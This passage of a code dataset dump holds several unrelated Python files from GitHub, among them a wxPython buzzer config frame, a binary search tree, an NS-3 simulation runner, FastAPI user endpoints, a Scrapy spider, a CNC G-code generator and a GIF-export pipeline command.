self.sizer.Add(self.finishButton, pos=(2, 0), span=(1,2), flag=wx.EXPAND)\n\n self.SetSizerAndFit(self.sizer)\n\n def updateFont(self, event):\n initialSize = dat.nameFontSize\n try:\n dat.nameFontSize = int( self.fontSizeSpinBox.GetValue())\n except:\n print(\"problem in getting font\")\n\n if initialSize != dat.nameFontSize:\n self.parent.parent.treePanel.updateTree()\n \nclass BuzzerConfigFrame(wx.Frame):\n def __init__(self, *args, **kwargs):\n \"\"\"Create the DemoFrame.\"\"\"\n wx.Frame.__init__(self, *args, **kwargs)\n\n # Add the Widget Panel\n self.Panel = BuzzerConfigPanel(self)\n self.Panel.finishButton.Bind(wx.EVT_BUTTON, self.finishAndUpdate)\n self.Fit()\n\n icon = wx.Icon()\n icon.CopyFromBitmap(wx.Bitmap(\n resource_path('resources/main_logo1.ico'), wx.BITMAP_TYPE_ANY))\n self.SetIcon(icon)\n \n def finishAndUpdate(self, event):\n dat.setKeycodes(self.Panel.contestantAKey.GetValue(), self.Panel.contestantBKey.GetValue())\n print('set keycodes')\n print(dat.buzzerConfig)\n self.OnQuit()\n \n def OnQuit(self, event=None):\n \"\"\"Exit application.\"\"\"\n self.Close()\n\n","repo_name":"parkhays/MCBuzzer","sub_path":"Source/buzzersetupframe.py","file_name":"buzzersetupframe.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29976817217","text":"\ndef vertical_txt(txt):\n lst=txt.split(' ')\n max=0\n 
lst2=[]\n for i in lst:\n if len(i)>max:\n max=len(i)\n for i in lst:\n lst2.append(i+' '*(max-len(i)))\n result=[]\n for i in range(max):\n temp=[]\n for j in lst2:\n temp.append(j[i])\n result.append(temp)\n return result\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"cBPj6yfALGfmeZQLG_17.py","file_name":"cBPj6yfALGfmeZQLG_17.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73192883612","text":"def min_max_sum(numbers):\n list_numbers = list(map(int, numbers.split()))\n min_numbers = min(list_numbers)\n max_numbers = max(list_numbers)\n sum_numbers = sum(list_numbers)\n\n return min_numbers, max_numbers, sum_numbers\n\n\nnums = input()\nmin_of_nums, max_of_nums, sum_of_nums = min_max_sum(nums)\nprint(f\"The minimum number is {min_of_nums}\")\nprint(f\"The maximum number is {max_of_nums}\")\nprint(f\"The sum number is: {sum_of_nums}\")","repo_name":"SAyvazova/SoftUni-Python","sub_path":"2_Fundamentals/4_Functions_Exercises/7_min_max_sum.py","file_name":"7_min_max_sum.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73077260571","text":"##########################################################\n# Arvore Genérica #\n# #\n# Necessário implementar um método getVal() no objeto #\n# em que neste método se irá retornar a chave usada na #\n# árvore #\n##########################################################\n\n\nclass BinaryTree:\n # Métodos Padrões\n def __init__(self, data=None, left=None, right=None):\n self.__data = data\n self.__left = left\n self.__right = right\n\n def __str__(self):\n return str(self.__data.getVal()) + \"\\n\"\n\n # Métodos de Imprimir\n def preOrder(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n if self.__left is not None:\n self.__left.preOrder()\n if self.__right is not None:\n self.__right.preOrder()\n print(self)\n\n def postOrder(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n print(self)\n if self.__left is not None:\n self.__left.postOrder()\n if self.__right is not None:\n self.__right.postOrder()\n\n def simmetric(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n if self.__left is not None:\n self.__left.simmetric()\n print(self)\n if self.__right is not None:\n self.__right.simmetric()\n\n def invertedIndex(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n if self.__left is not None:\n self.__left.invertedIndex()\n print(self.__data)\n if self.__right is not None:\n self.__right.invertedIndex()\n \n # Altura\n def height(self):\n if self.__left is None and self.__right is None:\n return 0 # Mudado aqui\n else:\n hl = 0\n hr = 0\n if self.__left is not None:\n hl = self.__left.height()\n if self.__right is not None:\n hr = self.__right.height()\n if hl > hr:\n return 1 + hl\n else:\n return 1 + hr\n\n # Inserção e Remoção\n def insert(self, data, comp):\n if self.__data is None:\n self.__data = data\n else:\n aux = None\n aux2 = self\n while aux2 is not None:\n aux = aux2\n if comp(aux2.__data.getVal(), data.getVal()) == 1:\n aux2 = aux2.__left\n else:\n aux2 = aux2.__right\n if comp(aux.__data.getVal(), data.getVal()) == 1:\n aux.__left = BinaryTree(data)\n else:\n aux.__right = BinaryTree(data)\n\n def remove(self, key, comp):\n if self.__data is None:\n return None\n if self.__data is not None:\n if comp(self.__data.getVal(), key) 
== 0:\n data = self.__data\n if self.__left is not None:\n self.__data = self.remove(self.__left.maxTree().getVal(),\n comp)\n elif self.__right is not None:\n self.__data = self.remove(self.__right.minTree().getVal(),\n comp)\n else:\n self.__data = None\n return data\n aux = None\n aux2 = self\n while aux2 is not None:\n if comp(aux2.__data.getVal(), key) == 0:\n break\n aux = aux2\n if comp(aux2.__data.getVal(), key) == 1:\n aux2 = aux2.__left\n else:\n aux2 = aux2.__right\n if aux2 is not None:\n data = aux2.__data\n if aux2.__left is None and aux2.__right is None:\n if aux.__left == aux2:\n aux.__left = None\n else:\n aux.__right = None\n elif aux2.__left is None and aux2.__right is not None:\n if aux.__left == aux2:\n aux.__left = aux2.__right\n else:\n aux.__right = aux2.__right\n elif aux2.__left is not None and aux2.__right is None:\n if aux.__left == aux2:\n aux.__left = aux2.__left\n else:\n aux.__right = aux2.__left\n else:\n aux2.__data = aux2.remove(aux2.__left.maxTree().getVal(), comp)\n return data\n\n # Máximos e Mínimos\n def maxTree(self):\n aux = self\n while aux.__right is not None:\n aux = aux.__right\n return aux.__data\n\n def minTree(self):\n aux = self\n while aux.__left is not None:\n aux = aux.__left\n return aux.__data\n\n # Busca\n def search(self, key, comp):\n aux = self\n while aux is not None:\n if comp(aux.__data.getVal(), key) == 0:\n return aux.__data\n if comp(aux.__data.getVal(), key) == 1:\n aux = aux.__left\n else:\n aux = aux.__right\n","repo_name":"elheremes/EDII_arvores","sub_path":"BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"20619472078","text":"#This script is used to automate the waf commands that run compression simulation in NS-3\n#It will run through high entropy first then it will run through low entropy \n#This script changes the number of packets by 500 each time.\n\n#Needed to run command line arguments in python\nimport os\n\n#Example run of compression sim using waf commands for reference\n#In this case every parameter is present.\n#./waf --run \"4node-compression --outputFile=./test.dat --entropy=h \n#--numPackets=1000 --packetSize=1024 --interPacketTime=.0000001 --s0p0Delay=30ms \n#--p0p1Delay=30ms --p1r0Delay=30ms --s0p0DataRate=5Mbps --p0p1DataRate=4Mbps \n#--p1r0DataRate=5Mbps --queueMode=b --s0QueueSize=655350000 --p0QueueSize=655350000 \n#--p1QueueSize=655350000 --compression=1\"\n\n#Directory where NS-3 is located waf commands can be run here.\npathTo = \"/home/mario/repos/ns-allinone-3.14.1/ns-3.14.1\"\n\n#This command changes the directory to where the waf commands are enabled\nos.chdir(pathTo)\n\n#The below command is a simple example waf command of how to execute the compression simulation.\n#os.system('./waf --run \"compression-sim --numPackets=50 --packetSize=500\"')\n\ncompression_args = {}\n\n#Experiment Settings Default Values\ncompression_args['compression'] = '1'\ncompression_args['queueMode'] = 'p'\ncompression_args['entropy'] = 'h'\n\ncompression_args['packetSize'] = '1100'\ncompression_args['numPackets'] = '500'\ncompression_args['interPacketTime'] = '0.00000001'\n\ncompression_args['s0QueueSize'] = '2000'\ncompression_args['p0QueueSize'] = '1000' #Compressor Transmission queue size\ncompression_args['p1QueueSize'] = '2000'\n\ncompression_args['p0p1DataRate'] = '1Mbps' #Compression link\ncompression_args['s0p0DataRate'] = '5Mbps' \ncompression_args['p1r0DataRate'] 
= '5Mbps'\n\ncompression_args['s0p0Delay']='30ms'\ncompression_args['p0p1Delay']='30ms'\ncompression_args['p1r0Delay']='30ms'\n\n#change values here to alter the name of the first half outputfile\ncompression_args['outputFile'] = './test' + '_6Mbps_' + '_num_of_packets_'\n\nbandwidth = ['1Mbps', '4Mbps', '5Mbps', '6Mbps']\n\n#automate compression simulation run for high and low entropy\n#for high entropy\nnumPackets = 500\nfor x in range(500, 6500, 500):\n\tcomp_cmds = './waf --run \"'\n\tcomp_cmds += 'compression-sim'\n\tcomp_cmds += ' --outputFile=' + compression_args['outputFile'] + str(numPackets) + '_H_' + '.csv' #rest of outputfile name\n\tcomp_cmds += ' --packetSize=' + compression_args['packetSize']\n\tcomp_cmds += ' --s0p0DataRate=' + compression_args['s0p0DataRate']\n\tcomp_cmds += ' --p1r0DataRate=' + compression_args['p1r0DataRate']\n\tcomp_cmds += ' --compression=' + compression_args['compression']\n\tcomp_cmds += ' --queueMode=' + compression_args['queueMode']\n\t#altered params\n\tcomp_cmds += ' --numPackets=' + str(numPackets)\n\tcomp_cmds += ' --entropy=' + 'h'\n\tcomp_cmds += ' --p0p1DataRate=' + '6Mbps'\n\tcomp_cmds += ' --p0QueueSize=' + compression_args['p0QueueSize']\n\tcomp_cmds += '\"'\n\tos.system(comp_cmds) \n\tnumPackets += 500\n#for low entropy\n#reset number of packets back to 500\nnumPackets = 500\nfor x in range(500, 6500, 500):\n\tcomp_cmds = './waf --run \"'\n\tcomp_cmds += 'compression-sim'\n\tcomp_cmds += ' --outputFile=' + compression_args['outputFile'] + str(numPackets) + '_L_' + '.csv'\n\tcomp_cmds += ' --packetSize=' + compression_args['packetSize']\n\tcomp_cmds += ' --s0p0DataRate=' + compression_args['s0p0DataRate']\n\tcomp_cmds += ' --p1r0DataRate=' + compression_args['p1r0DataRate']\n\tcomp_cmds += ' --compression=' + compression_args['compression']\n\tcomp_cmds += ' --queueMode=' + compression_args['queueMode']\n\t#altered params\n\tcomp_cmds += ' --numPackets=' + str(numPackets)\n\tcomp_cmds += ' --entropy=' + 'l'\n\tcomp_cmds += ' --p0p1DataRate=' + '6Mbps'\n\tcomp_cmds += ' --p0QueueSize=' + compression_args['p0QueueSize']\n\tcomp_cmds += '\"'\n\tos.system(comp_cmds) \n\tnumPackets += 500","repo_name":"mg424/Compression-Analysis","sub_path":"code/automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"808197826","text":"# -*- coding: utf-8 -*-\nfrom fastapi import APIRouter, Depends, UploadFile, File, Form\nfrom fastapi.responses import JSONResponse\nfrom sqlalchemy.orm import Session\n\nfrom extend.get_db import get_db\nfrom models.user.user_model import User\nfrom models.user.user_ret_model import UserRet\nfrom utils import token\nfrom utils.get_md5_data import get_md5_pwd\nfrom models.user.user_operation import get_user_pagenation, get_user_total, active, user_update, delete_user_by_id, \\\n user_add, get_user_query_pagenation, get_user_query_total, get_departments, get_departments_except_me, \\\n get_user_by_id\n\nrouter = APIRouter(\n prefix='/user'\n)\n\n\n@router.get('/user_list', tags=['用户模块'])\ndef get_user_list(page_size: int, current_page: int, id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n users = get_user_pagenation(db, page_size, current_page)\n total = get_user_total(db)\n departments = get_departments(db) # 用于前端选择部门时展示\n content = {\n 'users': users,\n 'pageSize': page_size,\n 'currentPage': current_page,\n 'pageTotal': total,\n 'departments': departments\n }\n return 
content\n\n\n@router.get('/query', tags=['用户模块'])\ndef get_user_query_list(username: str, department_name: str, page_size: int, current_page: int,\n id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n users = get_user_query_pagenation(db, username, department_name, page_size, current_page)\n total = get_user_query_total(db, username, department_name)\n\n content = {\n 'users': users,\n 'pageSize': page_size,\n 'currentPage': current_page,\n 'pageTotal': total\n }\n return content\n\n\n@router.post('/active', tags=['用户模块'])\ndef active_user(user: UserRet, id: str = Depends(token.parse_token), db: Session = Depends(get_db)):\n if user.state == 1:\n state = 2\n else:\n state = 1\n\n active(db, user.id, state)\n if user.state == 1:\n return {'code': 200, 'msg': '停用成功', 'state': 1}\n if user.state == 2:\n return {'code': 200, 'msg': '启用成功', 'state': 2}\n\n\n# 添加用户\n@router.post('/add', tags=['用户模块'])\nasync def add(avatar: UploadFile = File(...),\n username: str = Form(...),\n department_name: str = Form(...),\n pwd: str = Form(...),\n addr: str = Form(...),\n state: int = Form(...),\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n rep = await avatar.read()\n file_path = 'uploads/users/' + avatar.filename\n with open(file_path, 'wb') as f:\n f.write(rep)\n md5_pwd = get_md5_pwd(pwd)\n user_add(db, username, md5_pwd, addr, state, file_path, department_name)\n return JSONResponse(content={\n 'code': 200,\n 'msg': '添加成功',\n })\n\n\n# 用户修改,涉及图片上传,用formdata的形式\n@router.post('/edit', tags=['用户模块'])\nasync def edit(avatar: UploadFile = File(...),\n id: int = Form(...),\n username: str = Form(...),\n pwd: str = Form(...),\n addr: str = Form(...),\n state: int = Form(...),\n department_name: str = Form(...),\n # create_time: str = Form(...),\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n rep = await avatar.read()\n file_path = 'uploads/users/' + avatar.filename\n with open(file_path, 'wb') as f:\n f.write(rep)\n if pwd:\n md5_pwd = get_md5_pwd(pwd)\n else:\n md5_pwd = None\n user_update(db, id, username, md5_pwd, addr, state, file_path, department_name)\n\n return {'code': 200, 'msg': '更新成功', 'id': id}\n\n\n@router.post('/delete', tags=['用户模块'])\ndef delete_user(user: UserRet,\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n id = user.id\n delete_user_by_id(db, id)\n return JSONResponse(content={\n 'code': 200,\n 'msg': '删除成功',\n 'id': id\n })\n\n\n# 获取所有的部门\n@router.get('/get_departments', tags=['用户模块'])\ndef get_department(user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n departments = get_departments(db)\n return {\n 'code': 200,\n 'msg': '查询成功',\n 'departments': departments\n }\n\n\n# 获取除自己以外的所有部门\n@router.get('/get_departments_except_me', tags=['用户模块'])\ndef get_department_except(\n id: int,\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n departments = get_departments_except_me(db, id)\n return {\n 'code': 200,\n 'msg': '查询成功',\n 'departments': departments\n }\n\n\n# 获取用户头像\n@router.get('/get_avatar', tags=['用户模块'])\ndef get_avatar(user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n user = get_user_by_id(db, int(user_id))\n return {\n 'code': 200,\n 'avatar': user.avatar,\n 
}\n","repo_name":"springleeo/share_system","sub_path":"apps/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35263003468","text":"import numpy as np\nfrom dolfin import*\n\ndef save_mesh(name,mesh,subdomains,meshes_location = \"./meshes\",paraview_location = \"./paraview\"):\n File(meshes_location+\"/3D/\" + name + \".xml\") << mesh\n File(paraview_location+\"/3D/\" + name + \"_mesh.pvd\") << mesh\n File(meshes_location+\"/3D/\" + name + \"_physical_region.xml\") << subdomains\n File(paraview_location+\"/3D/\" + name + \"_physical_region.pvd\") << subdomains\n return 0\n\ndef save_name(name,results_location=\"./results\"):\n text_file = open(results_location + \"/3D/Data/name.txt\", \"w\")\n text_file.write(name)\n text_file.close()\n\ndef save_elast_moduli(C,name,results_location=\"./results\"):\n np.savetxt(results_location + \"/3D/\" + name + \"_C.txt\", C)\n\ndef save_E_nu(name,Exx,Eyy,Ezz,Gxy,Gzx,Gyz,nuxy,nuzx,nuyz,results_location = \"./results\"):\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Exx.txt\", Exx) \n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Eyy.txt\", Eyy)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Ezz.txt\", Ezz)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Gxy.txt\", Gxy)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Gzx.txt\", Gzx)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Gyz.txt\", Gyz)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nuxy.txt\", nuxy)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nuzx.txt\", nuzx)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nuyz.txt\", nuyz)\n\ndef save_E_nu_iso(name,Exx=None,nuxy=None,results_location = \"./results\"):\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_E.txt\", Exx) \n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nu.txt\", nuxy)\n \ndef save_Elast_mpi(C_0,C_1,C,name):\n output_file = HDF5File(\"./results/3D/moduli.h5\", \"w\")\n output_file.write(C_0, \"c_0\"+name)\n output_file.write(C_1, \"c_1\"+name)\n output_file.write(C, \"C\"+name)\n output_file.close()\n \ndef save_graphs(name,vol_frac,s,C,K_Voigt,K_Reuss,G_Voigt,G_Reuss,K_Mori_Tanaka,G_Mori_Tanaka,K_num,G_num,results_location=\"./results\"):\n file = open(results_location+\"/3D/Graphs/{}_{}_{}.txt\".format(name,str(int(s)),str(round(vol_frac,2))[2:]),\"w\")\n file.write(\"E0/E1 = {} \\nvf = {} \\n\".format(s,vol_frac))\n file.write(\"K Voigt : {} \\n\".format(K_Voigt))\n file.write(\"K Reuss : {} \\n\".format(K_Reuss))\n file.write(\"MTK : {} \\n\".format(K_Mori_Tanaka))\n file.write(\"FEM_A_K: {} \\n\".format(K_num))\n file.write(\"K00 : {} \\n\".format((C[0,0] + 2 * C[0,1])/3))\n file.write(\"K11 : {} \\n\".format((C[1,1] + 2 * C[1,2])/3))\n file.write(\"K22 : {} \\n\".format((C[2,2] + 2 * C[2,1])/3))\n file.write(\"G Voigt : {} \\n\".format(G_Voigt))\n file.write(\"G Reuss : {} \\n\".format(G_Reuss))\n file.write(\"MTG : {} \\n\".format(G_Mori_Tanaka))\n file.write(\"FEM_A_G : {} \\n\".format(G_num))\n file.write(\"G33 : {} \\n\".format((C[3,3])))\n file.write(\"G44 : {} \\n\".format((C[4,4])))\n file.write(\"G55 : {} \\n\".format((C[5,5])))\n\n \n\n \n\n\n\n\n\n\n\n\n\n\n\n 
","repo_name":"acseai1419/Crius","sub_path":"numerical_analysis/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20536961797","text":"# -*- coding: utf-8 -*-\nimport re\nfrom decimal import Decimal\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.item import Item, Field\nimport json\nimport itertools\n\nfrom scrapy import log\n\nfrom product_spiders.spiders.bensons.bedroomworld_co_uk import BedroomworldSpider\n\nfrom product_spiders.base_spiders.primary_spider import PrimarySpider\n\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\n\nclass Meta(Item):\n net_price = Field()\n\n\nclass BedroomworldSpider(BedroomworldSpider):\n name = \"colourbank-bedroomworld.co.uk\"\n allowed_domains = ('bedroomworld.co.uk', )\n start_urls = ('http://www.bedroomworld.co.uk/', )\n\n shipping_costs = {'MATTRESS': 9.99,\n 'DIVAN BED': 19.99,\n 'BEDSTEAD': 9.99,\n 'FURNITURE': 9.99,\n 'PILLOWS': 3.99}\n\n def _start_requests(self):\n # yield Request('http://www.bedroomworld.co.uk/p/Slumberland_Harmony_800_Pocket_Divan_Set.htm', callback=self.parse_product)\n # yield Request('http://www.bedroomworld.co.uk/p/Kingston_Single_Folding_Bed.htm', callback=self.parse_product)\n yield Request('http://www.bedroomworld.co.uk/p/Baltic_Futon_Set.htm', callback=self.parse_product)\n\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n loader = ProductLoader(item=Product(), response=response)\n self.log('Parsing %s' %response.url)\n self.log('Name %s' %hxs.select('//span[@itemprop=\"name\"]/text()').extract())\n sku = response.xpath('//div[contains(@class, \"order_code\")]/text()').extract()\n sku = sku[0].split()[0] if sku else ''\n loader.add_value('sku', sku)\n loader.add_value('url', response.url)\n loader.add_xpath('name', '//span[@itemprop=\"name\"]/text()')\n loader.add_xpath('price', '//span[starts-with(@id,\"item_price_\")]/text()')\n for category in hxs.select('//div[contains(@class, \"ws-breadcrumb\")]/a/text()').extract()[1:]:\n loader.add_value('category', category)\n img = hxs.select('//img[@id=\"imageMain\"]/@src').extract()\n if img:\n loader.add_value('image_url', urljoin_rfc(get_base_url(response), img[0]))\n\n brand = response.xpath('//span[@itemprop=\"brand\"]/text()').extract()\n brand = brand[0].strip() if brand else ''\n loader.add_value('brand', brand)\n\n names = {}\n for opt in hxs.select('//option[@mcode]'):\n mcode = opt.select('./@mcode').extract()[0]\n text = opt.select('normalize-space(./text())').extract()[0]\n names[mcode] = text\n \n loader.add_xpath('identifier', '//input[@id=\"item_details_product_id\"]/@value')\n loader.add_xpath('price', '//meta[@itemprop=\"price\"]/@content')\n loader.add_xpath('name', '//select[not(contains(@id, \"quantity_\"))]/option[@selected]/text()')\n product = loader.load_item()\n \n for key, shipping_cost in self.shipping_costs.iteritems():\n if key in product.get('category', \"\").upper():\n product['shipping_cost'] = shipping_cost\n break\n yield product\n \n url = 'http://www.bedroomworld.co.uk/ajax.get_exact_product.php?instart_disable_injection=true'\n sku = response.css('input#item_details_item_id::attr(value)').extract_first()\n attributes = 
response.xpath('//select/@id').re('(.+)_%s' %sku)\n attributes.remove('quantity')\n if not attributes:\n return\n options = []\n for attribute in attributes:\n options.append(response.xpath('//select[@id=\"%s_%s\"]/option/@value' %(attribute, sku)).extract())\n variants = itertools.product(*options)\n for variant in variants:\n formdata = {'item_id': sku}\n for attribute, option in zip(attributes, variant):\n formdata['attributes[%s]' %attribute] = option\n yield FormRequest(url, \n self.parse_options, \n formdata=formdata,\n meta={'item': Product(product)})\n\n def parse_options(self, response):\n json_data = json.loads(response.body)\n item = response.meta.get('item')\n prod_data = json_data['data']\n\n option_descriptions = prod_data['propertyType1']\n option_name = ''\n for option_desc in option_descriptions:\n if prod_data[option_desc].upper() not in item['name'].upper():\n option_name += ' ' + prod_data[option_desc]\n\n item['name'] += option_name\n item['identifier'] = prod_data['id']\n item['sku'] += '-' + prod_data['id']\n item['price'] = prod_data['ourprice']\n item['stock'] = prod_data['stockqty']\n\n yield item\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/colourbank/bedroomworld_spiders.py","file_name":"bedroomworld_spiders.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72513672412","text":"#!/usr/bin/env python3\n# -*- coding:utf8 -*-\nimport argparse\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument(\"--x-length\", help=\"X向长度(mm)\", type=int,required=True)\narg_parser.add_argument(\"--y-length\", help=\"Y向长度(mm)\", type=int,required=True)\n\narg_parser.add_argument(\"--line-width\", default=1.5,\n help=\"行距,一般为刀尖宽度/2\", type=float)\narg_parser.add_argument(\"--zero-pos\", default=\"LT\",\n help=\"对刀点:LT=左上,RT=左下,C=中心,LB=左下,RB=右下\")\narg_parser.add_argument(\"--speed\", default=500, help=\"行进速率F\", type=int)\narg_parser.add_argument(\"--safe-z\", default=10, help=\"安全高度\", type=int)\n\nargs = arg_parser.parse_args()\nif args.x_length <= 0 or args.y_length <= 0 or args.line_width <= 0.0:\n print(\"xy与行距均需大于0\")\n\nif args.zero_pos not in [\"LT\", \"RT\", \"C\", \"LB\", \"RB\"]:\n print(\"检测到不支持的对刀点,已将对刀点重置为左下\")\n args.zero_pos = \"LT\"\nfile_name = \"flat_zero_{}_{}_{}_{}_{}.gcode\".format(args.x_length, args.y_length,\n args.line_width, args.zero_pos, args.speed)\n\n\ncode_header = \"\"\"\nG0 Z{}\nG0 X{} Y{}\nG0 Z0\n\"\"\"\nmin_x = 0\nmin_y = 0 - args.y_length\nmax_x = args.x_length\nmax_y = 0\nif args.zero_pos == \"RT\":\n min_x = 0 - args.x_length\n min_y = 0-args.y_length\n max_x = 0\n max_y = 0\nelif args.zero_pos == \"C\":\n min_x = 0 - args.x_length/2\n min_y = 0-args.y_length/2\n max_x = args.x_length/2\n max_y = args.y_length/2\nelif args.zero_pos == \"LB\":\n min_x = 0\n min_y = 0\n max_x = args.x_length\n max_y = args.y_length\nelif args.zero_pos == \"RB\":\n min_x = 0 - args.x_length\n min_y = 0\n max_x = 0\n max_y = args.y_length\n\ncode_header = code_header.format(args.safe_z, min_x, min_y)\ncode = \"\"\ncode = code+code_header\ncurrent_y = min_y\nnext_x = min_x\nwhile current_y <= max_y:\n code = code+\"G1 X{} F{} \\n\".format(next_x, args.speed)\n next_x = min_x if next_x == max_x else max_x\n next_y = current_y+args.line_width if max_y - \\\n current_y >= args.line_width else max_y\n code = code+\"G1 Y{} F{} \\n\".format(next_y, args.speed)\n current_y = next_y if not current_y == 
next_y else current_y+1\n\nwith open(file_name, 'w') as source_file:\n source_file.write(code)\n source_file.flush()\n\nprint(\"保存为:{}\".format(file_name))\n","repo_name":"EnderCaster/CNC-flat-zero","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1436646384","text":"import click\n\nfrom vframe.utils import click_utils\nfrom vframe.models.types import FrameImage, FrameImageVar\nfrom vframe.utils.click_utils import processor\n\n@click.command('')\n@click.option('-o', '--output', 'opt_dir_out', required=True,\n help='Path to output directory')\n@click.option('-f', '--frame', 'opt_frame_type', default=FrameImage.DRAW.name.lower(),\n type=FrameImageVar,\n help=click_utils.show_help(FrameImage))\n@click.option('--fps', 'opt_fps', default=6,\n help='Override media FPS')\n@click.option('--loop', 'opt_loop', default=0,\n help='Number of times to loop GIF (0 = infinite)')\n@click.option('--colors', 'opt_colors', default=256,\n help='Number of times to loop GIF (0 = infinite)')\n@click.option('--optimize/--no-optimize', 'opt_optimize', \n is_flag=True, default=True,\n help='Number of times to loop GIF (0 = infinite)')\n@click.option('--subdirs', 'opt_keep_subdirs', is_flag=True,\n help='Keep subdirectory structure in output directory')\n@click.option('--palette', 'opt_palette', \n type=click.Choice(['web', 'adaptive']), default='web',\n help='Compression color palette')\n@click.option('--verbose', 'opt_verbose', is_flag=True,\n help='Check filesize after writing GIF')\n@processor\n@click.pass_context\ndef cli(ctx, sink, opt_dir_out, opt_frame_type, opt_fps, opt_keep_subdirs,\n opt_colors, opt_loop, opt_palette, opt_optimize, opt_verbose):\n \"\"\"Save to animated GIF\"\"\"\n \n from os.path import join\n from pathlib import Path\n\n import cv2 as cv\n from PIL import Image\n \n from vframe.settings.app_cfg import LOG, SKIP_FRAME, USE_DRAW_FRAME, READER\n from vframe.models.types import MediaType\n from vframe.utils.im_utils import np2pil, write_animated_gif\n from vframe.utils.file_utils import ensure_dir, filesize\n\n\n # ---------------------------------------------------------------------------\n # initialize\n\n if opt_frame_type == FrameImage.DRAW:\n ctx.obj[USE_DRAW_FRAME] = True\n \n frames = None\n fp_parent = None\n \n opt_palette = Image.WEB if opt_palette == 'web' else Image.ADAPTIVE\n opt_duration = 1000 // opt_fps\n\n convert_kwargs = {\n 'mode': 'P', \n 'dither': None, \n 'palette': opt_palette, \n 'colors': opt_colors,\n }\n gif_kwargs = {\n 'format': 'GIF',\n 'save_all': True, \n 'optimize': opt_optimize,\n 'duration': opt_duration, \n 'loop':opt_loop,\n }\n\n\n # ---------------------------------------------------------------------------\n # process \n \n while True:\n \n M = yield\n R = ctx.obj[READER]\n\n # Check if last file in a subdir\n if M.parent != fp_parent and frames is not None:\n write_animated_gif(fp_out, frames, verbose=opt_verbose, **gif_kwargs)\n frames = None\n fp_parent = None\n\n # check if new file in new subdir and start new gif\n if not ctx.obj[SKIP_FRAME] and \\\n frames is None and \\\n M.parent != fp_parent:\n\n # configure file io, add relative subdir output dir\n if opt_keep_subdirs and M.parent != Path(R.filepath):\n fp_subdir_rel = Path(M.filepath).relative_to(Path(R.filepath)).parent\n else:\n fp_subdir_rel = ''\n\n # output directory\n fp_dir_out = join(opt_dir_out, fp_subdir_rel)\n ensure_dir(fp_dir_out)\n\n # 
filename\n if M.type == MediaType.VIDEO:\n fn = Path(M.filename).stem # use video name as dir\n elif M.type == MediaType.IMAGE:\n fn = M.parent.name # use subdir name\n\n # output file\n fp_out = join(fp_dir_out, f'{fn}.gif')\n\n # init frames holder and store reference to current dir\n frames = []\n fp_parent = M.parent\n if opt_verbose:\n LOG.debug(f'Start: {fp_out}')\n\n\n # check if frame is usable and add to stack\n if not ctx.obj[SKIP_FRAME] and frames is not None:\n im = M.images.get(opt_frame_type)\n im_pil = np2pil(im).convert(**convert_kwargs)\n frames.append(im_pil)\n\n # check if last frame of last file\n if R.is_last_item and frames is not None and len(frames):\n write_animated_gif(fp_out, frames, verbose=opt_verbose, **gif_kwargs)\n frames = None\n fp_parent = None\n\n\n sink.send(media)","repo_name":"vframeio/vframe","sub_path":"src/commands/pipe/save-gif.py","file_name":"save-gif.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"32"} +{"seq_id":"11147000142","text":"import 